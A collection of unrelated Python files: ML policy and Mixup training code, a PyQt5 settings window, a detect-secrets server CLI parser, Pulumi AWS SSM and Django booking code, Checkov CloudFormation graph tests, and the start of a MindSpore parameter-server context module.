def test_get_action_img_obs(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test get_action function with akro.Image observation space."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
action, _ = policy.get_action(obs)
assert env.action_space.contains(action)
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_get_actions(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test get_actions function with akro.Image observation space."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
actions, _ = policy.get_actions([obs, obs, obs])
for action in actions:
assert env.action_space.contains(action)
torch_obs = torch.Tensor(obs)
actions, _ = policy.get_actions([torch_obs, torch_obs, torch_obs])
for action in actions:
assert env.action_space.contains(action)
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_is_pickleable(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test if policy is pickable."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
output_action_1, _ = policy.get_action(obs)
p = cloudpickle.dumps(policy)
policy_pickled = cloudpickle.loads(p)
output_action_2, _ = policy_pickled.get_action(obs)
assert env.action_space.contains(output_action_1)
assert env.action_space.contains(output_action_2)
assert output_action_1.shape == output_action_2.shape
def test_does_not_support_dict_obs_space(self):
"""Test that policy raises error if passed a dict obs space."""
env = GymEnv(DummyDictEnv(act_space_type='discrete'))
with pytest.raises(ValueError,
match=('CNN policies do not support '
'with akro.Dict observation spaces.')):
CategoricalCNNPolicy(env=env,
kernel_sizes=(3, ),
hidden_channels=(3, ))
def test_invalid_action_spaces(self):
"""Test that policy raises error if passed a box obs space."""
env = GymEnv(DummyDictEnv(act_space_type='box'))
with pytest.raises(ValueError):
CategoricalCNNPolicy(env=env,
kernel_sizes=(3, ),
hidden_channels=(3, ))
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_obs_unflattened(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test if a flattened image obs is passed to get_action
then it is unflattened.
"""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
env.reset()
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
obs = env.observation_space.sample()
action, _ = policy.get_action(env.observation_space.flatten(obs))
env.step(action)
|
nilq/baby-python
|
python
|
# coding=utf-8
import numpy as np
import torch.nn.functional as F
from datautil.util import random_pairs_of_minibatches
from alg.algs.ERM import ERM
class Mixup(ERM):
def __init__(self, args):
super(Mixup, self).__init__(args)
self.args = args
def update(self, minibatches, opt, sch):
objective = 0
for (xi, yi, di), (xj, yj, dj) in random_pairs_of_minibatches(self.args, minibatches):
lam = np.random.beta(self.args.mixupalpha, self.args.mixupalpha)
x = (lam * xi + (1 - lam) * xj).cuda().float()
predictions = self.predict(x)
objective += lam * F.cross_entropy(predictions, yi.cuda().long())
objective += (1 - lam) * \
F.cross_entropy(predictions, yj.cuda().long())
objective /= len(minibatches)
opt.zero_grad()
objective.backward()
opt.step()
if sch:
sch.step()
return {'class': objective.item()}
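# --- Hedged illustration (added; not part of the original class) of the mixup
# step implemented in update() above. With lam ~ Beta(alpha, alpha), each
# virtual sample is a convex combination of two real samples, and the loss is
# blended with the same weight:
#   x    = lam * xi + (1 - lam) * xj
#   loss = lam * CE(f(x), yi) + (1 - lam) * CE(f(x), yj)
# For example, lam = 0.7 mixes 70% of image xi with 30% of image xj, and the
# cross-entropy targets yi and yj are weighted 0.7 and 0.3 accordingly.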
|
nilq/baby-python
|
python
|
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(800, 600)
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setStyleSheet("* {\n"
" padding: 0px;\n"
"}")
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.scrollArea = QtWidgets.QScrollArea(self.centralwidget)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 780, 580))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.scrollAreaWidgetContents.sizePolicy().hasHeightForWidth())
self.scrollAreaWidgetContents.setSizePolicy(sizePolicy)
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.scrollAreaWidgetContents)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setSpacing(8)
self.gridLayout.setObjectName("gridLayout")
self.font_size_spin_box = QtWidgets.QSpinBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.font_size_spin_box.sizePolicy().hasHeightForWidth())
self.font_size_spin_box.setSizePolicy(sizePolicy)
self.font_size_spin_box.setMinimumSize(QtCore.QSize(60, 0))
self.font_size_spin_box.setMaximumSize(QtCore.QSize(60, 16777215))
self.font_size_spin_box.setStyleSheet("padding: 8px;")
self.font_size_spin_box.setMaximum(1638)
self.font_size_spin_box.setObjectName("font_size_spin_box")
self.gridLayout.addWidget(self.font_size_spin_box, 3, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 2, 3, 1, 1)
self.font_family_combo_box = QtWidgets.QFontComboBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.font_family_combo_box.sizePolicy().hasHeightForWidth())
self.font_family_combo_box.setSizePolicy(sizePolicy)
self.font_family_combo_box.setStyleSheet("padding: 8px;")
self.font_family_combo_box.setObjectName("font_family_combo_box")
self.gridLayout.addWidget(self.font_family_combo_box, 3, 0, 1, 1)
self.apply_button = QtWidgets.QPushButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.apply_button.sizePolicy().hasHeightForWidth())
self.apply_button.setSizePolicy(sizePolicy)
self.apply_button.setMinimumSize(QtCore.QSize(71, 0))
self.apply_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.apply_button.setStyleSheet("padding: 8px;")
self.apply_button.setObjectName("apply_button")
self.gridLayout.addWidget(self.apply_button, 1, 3, 1, 1)
self.margin_spin_box = QtWidgets.QSpinBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.margin_spin_box.sizePolicy().hasHeightForWidth())
self.margin_spin_box.setSizePolicy(sizePolicy)
self.margin_spin_box.setMinimumSize(QtCore.QSize(60, 0))
self.margin_spin_box.setMaximumSize(QtCore.QSize(60, 16777215))
self.margin_spin_box.setStyleSheet("padding: 8px;")
self.margin_spin_box.setMaximum(1000000)
self.margin_spin_box.setObjectName("margin_spin_box")
self.gridLayout.addWidget(self.margin_spin_box, 3, 3, 1, 1)
self.preview_text_line_edit = QtWidgets.QLineEdit(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.preview_text_line_edit.sizePolicy().hasHeightForWidth())
self.preview_text_line_edit.setSizePolicy(sizePolicy)
self.preview_text_line_edit.setStyleSheet("padding: 8px;")
self.preview_text_line_edit.setPlaceholderText("")
self.preview_text_line_edit.setObjectName("preview_text_line_edit")
self.gridLayout.addWidget(self.preview_text_line_edit, 1, 0, 1, 3)
self.label = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 2, 0, 1, 3)
self.change_color_button = QtWidgets.QPushButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.change_color_button.sizePolicy().hasHeightForWidth())
self.change_color_button.setSizePolicy(sizePolicy)
self.change_color_button.setMinimumSize(QtCore.QSize(24, 24))
self.change_color_button.setMaximumSize(QtCore.QSize(24, 24))
self.change_color_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.change_color_button.setStyleSheet("border-style: solid;\n"
"border-radius: 2px;\n"
"background-color: #ffffff;\n"
"border-color: black;\n"
"border-width: 1px;\n"
"")
self.change_color_button.setText("")
self.change_color_button.setObjectName("change_color_button")
self.gridLayout.addWidget(self.change_color_button, 3, 2, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout)
self.preview_label = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.preview_label.sizePolicy().hasHeightForWidth())
self.preview_label.setSizePolicy(sizePolicy)
self.preview_label.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(20)
self.preview_label.setFont(font)
self.preview_label.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.preview_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.preview_label.setStyleSheet("background-color: black;\n"
"color: white;\n"
"padding: 16px;")
self.preview_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.preview_label.setWordWrap(True)
self.preview_label.setObjectName("preview_label")
self.verticalLayout_3.addWidget(self.preview_label)
self.verticalLayout_2.addLayout(self.verticalLayout_3)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout.addWidget(self.scrollArea)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Configurações de projeção"))
self.label_2.setText(_translate("MainWindow", "Margem"))
self.apply_button.setText(_translate("MainWindow", "Aplicar"))
self.preview_text_line_edit.setText(_translate("MainWindow", "Texto de teste"))
self.label.setText(_translate("MainWindow", "Fonte:"))
self.preview_label.setText(_translate("MainWindow", "Texto de teste"))
|
nilq/baby-python
|
python
|
from __future__ import absolute_import
import argparse
from detect_secrets.core.usage import ParserBuilder
import detect_secrets_server
from .add import AddOptions
from .install import InstallOptions
from .list import ListOptions
from .scan import ScanOptions
class ServerParserBuilder(ParserBuilder):
"""Arguments, for the server component"""
def __init__(self):
super(ServerParserBuilder, self).__init__()
self._add_server_use_arguments()
def _add_version_argument(self):
"""Overridden, because we don't want to be showing the version
of detect-secrets plugin that we depend on.
"""
self.parser.add_argument(
'--version',
action='version',
version=detect_secrets_server.__version__,
help='Display version information.',
)
return self
def _add_server_use_arguments(self):
subparser = self.parser.add_subparsers(
dest='action',
)
for option in (AddOptions, ListOptions, InstallOptions, ScanOptions):
option(subparser).add_arguments()
return self
def parse_args(self, argv):
# NOTE: We can't just call `super`, because we need to parse the PluginOptions
# after we parse the config file, since we need to be able to distinguish
# between default values, and values that are set.
output = self.parser.parse_args(argv)
try:
if output.action == 'add':
AddOptions.consolidate_args(output)
if getattr(output, 'config', False):
apply_default_plugin_options_to_repos(output)
elif output.action == 'scan':
ScanOptions.consolidate_args(output)
elif output.action == 'install':
InstallOptions.consolidate_args(output)
elif output.action == 'list':
ListOptions.consolidate_args(output)
except argparse.ArgumentTypeError as e:
self.parser.error(e)
return output
def apply_default_plugin_options_to_repos(args):
"""
There are three ways to configure options (in order of priority):
1. command line
2. config file
3. default values
This applies default values to the config file, if appropriate.
"""
for tracked_repo in args.repo:
# TODO Issue 17: Not touching exclude_regex in repo metadata
# Just ignoring it for now and using the exclusion CLI args given when calling `scan`
# (This can be ignored because this function is only called by `add`)
for key in (
'baseline',
'crontab',
'exclude_regex',
'storage',
):
if key not in tracked_repo:
tracked_repo[key] = getattr(args, key)
if 'plugins' not in tracked_repo:
tracked_repo['plugins'] = {}
for key, value in args.plugins.items():
if key not in tracked_repo['plugins']:
tracked_repo['plugins'][key] = value
disabled_plugins = [
plugin_name
for plugin_name, value in tracked_repo['plugins'].items()
if value is False
]
for plugin_name in disabled_plugins:
del tracked_repo['plugins'][plugin_name]
if 'sha' not in tracked_repo:
tracked_repo['sha'] = ''
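# --- Hedged illustration (added; not part of the original module) of the
# default-merging above. The values are assumptions; the keys follow the ones
# used in apply_default_plugin_options_to_repos:
#   args: baseline=".secrets.baseline", crontab="0 * * * *",
#         plugins={"HexHighEntropyString": 3}
#   tracked_repo (from config): {"crontab": "30 2 * * *",
#                                "plugins": {"HexHighEntropyString": False}}
# After merging, the repo keeps its own crontab, inherits the baseline and the
# other defaults, and any plugin explicitly set to False is removed entirely.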
|
nilq/baby-python
|
python
|
from espnet_model_zoo.downloader import ModelDownloader
import sys
model_name = sys.argv[1]
d = ModelDownloader()
model_path = d.download(model_name)
print(model_path)
|
nilq/baby-python
|
python
|
larg = float(input('Qual a largura da parede?'))
alt = float(input('Qual a altura da parede?'))
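# Added comment: this assumes the usual convention for this exercise that one
# litre of paint covers 2 m² of wall, hence the division by 2 below.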
print('Você vai precisar de {:.0f} litros de tinta'.format((larg*alt)/2))
|
nilq/baby-python
|
python
|
# Difficulty Level: Beginner
# Question: Calculate the sum of the values of keys a and b .
# d = {"a": 1, "b": 2, "c": 3}
# Expected output:
# 3
# Program
d = {"a": 1, "b": 2, "c": 3}
print(d["a"] + d["b"])
# Output
# shubhamvaishnav:python-bootcamp$ python3 17_dictionary_items_sum_up.py
# 3
|
nilq/baby-python
|
python
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class Association(pulumi.CustomResource):
"""
Associates an SSM Document to an instance or EC2 tag.
"""
def __init__(__self__, __name__, __opts__=None, association_name=None, document_version=None, instance_id=None, name=None, output_location=None, parameters=None, schedule_expression=None, targets=None):
"""Create a Association resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, basestring):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if association_name and not isinstance(association_name, basestring):
raise TypeError('Expected property association_name to be a basestring')
__self__.association_name = association_name
"""
The descriptive name for the association.
"""
__props__['associationName'] = association_name
if document_version and not isinstance(document_version, basestring):
raise TypeError('Expected property document_version to be a basestring')
__self__.document_version = document_version
"""
The document version you want to associate with the target(s). Can be a specific version or the default version.
"""
__props__['documentVersion'] = document_version
if instance_id and not isinstance(instance_id, basestring):
raise TypeError('Expected property instance_id to be a basestring')
__self__.instance_id = instance_id
"""
The instance ID to apply an SSM document to. Use `targets` with key `InstanceIds` for document schema versions 2.0 and above.
"""
__props__['instanceId'] = instance_id
if name and not isinstance(name, basestring):
raise TypeError('Expected property name to be a basestring')
__self__.name = name
"""
The name of the SSM document to apply.
"""
__props__['name'] = name
if output_location and not isinstance(output_location, dict):
raise TypeError('Expected property output_location to be a dict')
__self__.output_location = output_location
"""
An output location block. Output Location is documented below.
"""
__props__['outputLocation'] = output_location
if parameters and not isinstance(parameters, dict):
raise TypeError('Expected property parameters to be a dict')
__self__.parameters = parameters
"""
A block of arbitrary string parameters to pass to the SSM document.
"""
__props__['parameters'] = parameters
if schedule_expression and not isinstance(schedule_expression, basestring):
raise TypeError('Expected property schedule_expression to be a basestring')
__self__.schedule_expression = schedule_expression
"""
A cron expression when the association will be applied to the target(s).
"""
__props__['scheduleExpression'] = schedule_expression
if targets and not isinstance(targets, list):
raise TypeError('Expected property targets to be a list')
__self__.targets = targets
"""
A block containing the targets of the SSM association. Targets are documented below. AWS currently supports a maximum of 5 targets.
"""
__props__['targets'] = targets
__self__.association_id = pulumi.runtime.UNKNOWN
super(Association, __self__).__init__(
'aws:ssm/association:Association',
__name__,
__props__,
__opts__)
def set_outputs(self, outs):
if 'associationId' in outs:
self.association_id = outs['associationId']
if 'associationName' in outs:
self.association_name = outs['associationName']
if 'documentVersion' in outs:
self.document_version = outs['documentVersion']
if 'instanceId' in outs:
self.instance_id = outs['instanceId']
if 'name' in outs:
self.name = outs['name']
if 'outputLocation' in outs:
self.output_location = outs['outputLocation']
if 'parameters' in outs:
self.parameters = outs['parameters']
if 'scheduleExpression' in outs:
self.schedule_expression = outs['scheduleExpression']
if 'targets' in outs:
self.targets = outs['targets']
|
nilq/baby-python
|
python
|
from django.db.models.query import Q
from django.utils import timezone
from rest_framework import serializers
from ..accounts.serializers import UserSerializer
from .models import Amenity, Booking
class AmenityRelatedField(serializers.RelatedField):
def to_native(self, value):
return {
'id': value.id,
'name': value.name,
}
class BookingSerializer(serializers.ModelSerializer):
resident = UserSerializer(read_only=True)
amenity_detail = AmenityRelatedField('amenity', read_only=True)
is_editable = serializers.SerializerMethodField('is_obj_editable')
is_removable = serializers.SerializerMethodField('is_obj_removable')
class Meta:
model = Booking
fields = ('id',
'resident',
'amenity',
'amenity_detail',
'reserved_from',
'reserved_to',
'is_editable',
'is_removable')
def is_obj_editable(self, obj):
return obj.has_permission(self.context['request'].user,
'amenities.change_booking')
def is_obj_removable(self, obj):
return obj.has_permission(self.context['request'].user,
'amenities.delete_booking')
def validate_amenity(self, attrs, source):
value = attrs[source]
if not value.is_available:
raise serializers.ValidationError("Amenity not available")
        if value not in self.context['request'].building.amenity_set.all():
raise serializers.ValidationError("Amenity not found")
return attrs
def validate_reserved_from(self, attrs, source):
value = attrs[source]
if value < timezone.now():
raise serializers.ValidationError("'From' date must be in future")
return attrs
def validate(self, attrs):
if attrs['reserved_from'] > attrs['reserved_to']:
raise serializers.ValidationError(
"The 'from' date is after the 'to' date")
        bookings = attrs['amenity'].booking_set.all()
        date_range = (attrs['reserved_from'], attrs['reserved_to'])
        # A booking conflicts if either of its endpoints falls inside the new
        # range, or if it fully contains the new range.
        qs = bookings.filter(
            Q(reserved_from__range=date_range) |
            Q(reserved_to__range=date_range) |
            Q(reserved_from__lte=attrs['reserved_from'],
              reserved_to__gte=attrs['reserved_to']))
booking_id = self.init_data.get('id')
if booking_id:
qs = qs.exclude(pk=booking_id)
if qs.exists():
raise serializers.ValidationError("Booking conflict")
return attrs
class AmenitySerializer(serializers.ModelSerializer):
class Meta:
model = Amenity
fields = ('id', 'name', 'is_available', )
|
nilq/baby-python
|
python
|
import os
from unittest import TestCase
from checkov.cloudformation.cfn_utils import create_definitions
from checkov.cloudformation.graph_builder.graph_components.block_types import BlockType
from checkov.cloudformation.graph_builder.graph_to_definitions import convert_graph_vertices_to_definitions
from checkov.cloudformation.graph_builder.local_graph import CloudformationLocalGraph
from checkov.cloudformation.parser import parse, TemplateSections
from checkov.runner_filter import RunnerFilter
TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))
class TestLocalGraph(TestCase):
def test_build_graph_with_single_resource(self):
relative_file_path = "../../checks/resource/aws/example_APIGatewayXray/APIGatewayXray-PASSED.yaml"
definitions = {}
file = os.path.realpath(os.path.join(TEST_DIRNAME, relative_file_path))
(definitions[relative_file_path], definitions_raw) = parse(file)
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
self.assertEqual(1, len(local_graph.vertices))
self.assertEqual(0, len(local_graph.edges))
resource_vertex = local_graph.vertices[0]
self.assertEqual("AWS::ApiGateway::Stage.MyStage", resource_vertex.name)
self.assertEqual("AWS::ApiGateway::Stage.MyStage", resource_vertex.id)
self.assertEqual(BlockType.RESOURCE, resource_vertex.block_type)
self.assertEqual("CloudFormation", resource_vertex.source)
self.assertDictEqual(definitions[relative_file_path]["Resources"]["MyStage"]["Properties"],
resource_vertex.attributes)
def test_build_graph_with_params_outputs(self):
relative_file_path = "../../checks/resource/aws/example_IAMRoleAllowAssumeFromAccount/example_IAMRoleAllowAssumeFromAccount-PASSED-2.yml"
definitions = {}
file = os.path.realpath(os.path.join(TEST_DIRNAME, relative_file_path))
(definitions[relative_file_path], definitions_raw) = parse(file)
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
self.assertEqual(len(local_graph.vertices), 57)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.CONDITIONS]), 2)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.RESOURCE]), 16)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.PARAMETERS]), 30)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.OUTPUTS]), 8)
self.assertEqual(len([v for v in local_graph.vertices if v.block_type == BlockType.MAPPINGS]), 1)
def test_vertices_from_local_graph(self):
resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, './resources/vertices'))
definitions, _ = create_definitions(root_folder=resources_dir, files=None, runner_filter=RunnerFilter())
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
definitions, breadcrumbs = convert_graph_vertices_to_definitions(local_graph.vertices, resources_dir)
self.assertIsNotNone(definitions)
self.assertEqual(len(definitions.items()), 2)
test_yaml_definitions = definitions[os.path.join(resources_dir, 'test.yaml')][TemplateSections.RESOURCES]
self.assertEqual(len(test_yaml_definitions.keys()), 2)
self.assertIn('MyDB', test_yaml_definitions.keys())
self.assertIn('MySourceQueue', test_yaml_definitions.keys())
test_json_definitions = definitions[os.path.join(resources_dir, 'test.json')][TemplateSections.RESOURCES]
self.assertEqual(len(test_json_definitions.keys()), 2)
self.assertIn('MyDB', test_json_definitions.keys())
self.assertIn('MySourceQueue', test_json_definitions.keys())
self.assertIsNotNone(breadcrumbs)
self.assertDictEqual(breadcrumbs, {}) # Will be changed when we add breadcrumbs to cfn vertices
def test_yaml_conditioned_vertices_from_local_graph(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, './resources/conditioned_vertices/yaml'))
file_name = 'test.yaml'
self.validate_conditioned_vertices_from_local_graph(root_dir, file_name)
def test_json_conditioned_vertices_from_local_graph(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, './resources/conditioned_vertices/json'))
file_name = 'test.json'
self.validate_conditioned_vertices_from_local_graph(root_dir, file_name)
def validate_conditioned_vertices_from_local_graph(self, root_dir, file_name):
true_condition_resources = {'BucketFnEqualsTrue', 'BucketFnNotTrue', 'BucketFnNotTrueThroughCondition',
'BucketFnAndTrue', 'BucketFnAndTrueWithCondition',
'BucketFnOrTrue', 'BucketFnOrTrueWithCondition'}
definitions, _ = create_definitions(root_folder=root_dir, files=None, runner_filter=RunnerFilter())
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=True)
definitions, breadcrumbs = convert_graph_vertices_to_definitions(local_graph.vertices, root_dir)
self.assertIsNotNone(definitions)
self.assertEqual(len(definitions.items()), 1)
test_yaml_definitions = definitions[os.path.join(root_dir, file_name)][TemplateSections.RESOURCES]
definitions_set = set(test_yaml_definitions.keys())
self.assertEqual(len(definitions_set), 7)
self.assertSetEqual(true_condition_resources, definitions_set)
def test_yaml_edges(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, 'resources/edges_yaml'))
self.validate_edges_count(root_dir)
def test_json_edges(self):
root_dir = os.path.realpath(os.path.join(TEST_DIRNAME, 'resources/edges_json'))
self.validate_edges_count(root_dir)
def validate_edges_count(self, root_dir) -> None:
expected_out_edges_count = {
'parameters.EnvType': 0,
'parameters.DataBucketName': 0,
'mappings.RegionMap': 0,
'conditions.CreateProdResources': 1,
'conditions.CreateDevResources': 1,
'AWS::EC2::Instance.EC2Instance': 4,
'AWS::EC2::VolumeAttachment.MountPoint': 3,
'AWS::EC2::Volume.NewVolume': 2,
'AWS::S3::Bucket.DataBucket': 4,
'outputs.EC2InstanceId': 1,
'outputs.EC2PublicDNS': 1,
'outputs.DataBucketUniqueId': 2
}
expected_in_edges_count = {
'parameters.EnvType': 4,
'parameters.DataBucketName': 3,
'mappings.RegionMap': 1,
'conditions.CreateProdResources': 3,
'conditions.CreateDevResources': 1,
'AWS::EC2::Instance.EC2Instance': 5,
'AWS::EC2::VolumeAttachment.MountPoint': 0,
'AWS::EC2::Volume.NewVolume': 1,
'AWS::S3::Bucket.DataBucket': 1,
'outputs.EC2InstanceId': 0,
'outputs.EC2PublicDNS': 0,
'outputs.DataBucketUniqueId': 0
}
definitions, _ = create_definitions(root_folder=root_dir, files=None, runner_filter=RunnerFilter())
local_graph = CloudformationLocalGraph(definitions)
local_graph.build_graph(render_variables=False)
idx_to_vertex_id = {idx: vertex.id for idx, vertex in enumerate(local_graph.vertices)}
        # we check that each entity in the template file has the right amount of out edges
out_edges_overall_count = 0
for vertex_index, actual_out_edges in local_graph.out_edges.items():
vertex_id = idx_to_vertex_id[vertex_index]
self.assertEqual(len(actual_out_edges), expected_out_edges_count[vertex_id], f'{vertex_id} actually has {len(actual_out_edges)} outgoing edges, not {expected_out_edges_count[vertex_id]}')
out_edges_overall_count += len(actual_out_edges)
        # we check that each entity in the template file has the right amount of in edges
        in_edges_overall_count = 0
        for vertex_index, actual_in_edges in local_graph.in_edges.items():
            vertex_id = idx_to_vertex_id[vertex_index]
            self.assertEqual(len(actual_in_edges), expected_in_edges_count[vertex_id], f'{vertex_id} actually has {len(actual_in_edges)} incoming edges, not {expected_in_edges_count[vertex_id]}')
            in_edges_overall_count += len(actual_in_edges)
        # we check that the overall amount of out edges equals the overall amount of in edges
        # and the overall amount of edges
self.assertEqual(out_edges_overall_count, in_edges_overall_count)
self.assertEqual(out_edges_overall_count, len(local_graph.edges))
|
nilq/baby-python
|
python
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Context for parameter server training mode"""
import os
from mindspore._checkparam import Validator
from mindspore._c_expression import PSContext
_ps_context = None
def ps_context():
"""
    Get the global _ps_context; create it if it does not exist yet.
Returns:
_ps_context, the global parameter server training mode context.
"""
global _ps_context
if _ps_context is None:
_ps_context = PSContext.get_instance()
return _ps_context
_set_ps_context_func_map = {
"server_mode": ps_context().set_server_mode,
"ms_role": ps_context().set_ms_role,
"enable_ps": ps_context().set_ps_enable,
"enable_fl": ps_context().set_ps_enable,
"worker_num": ps_context().set_worker_num,
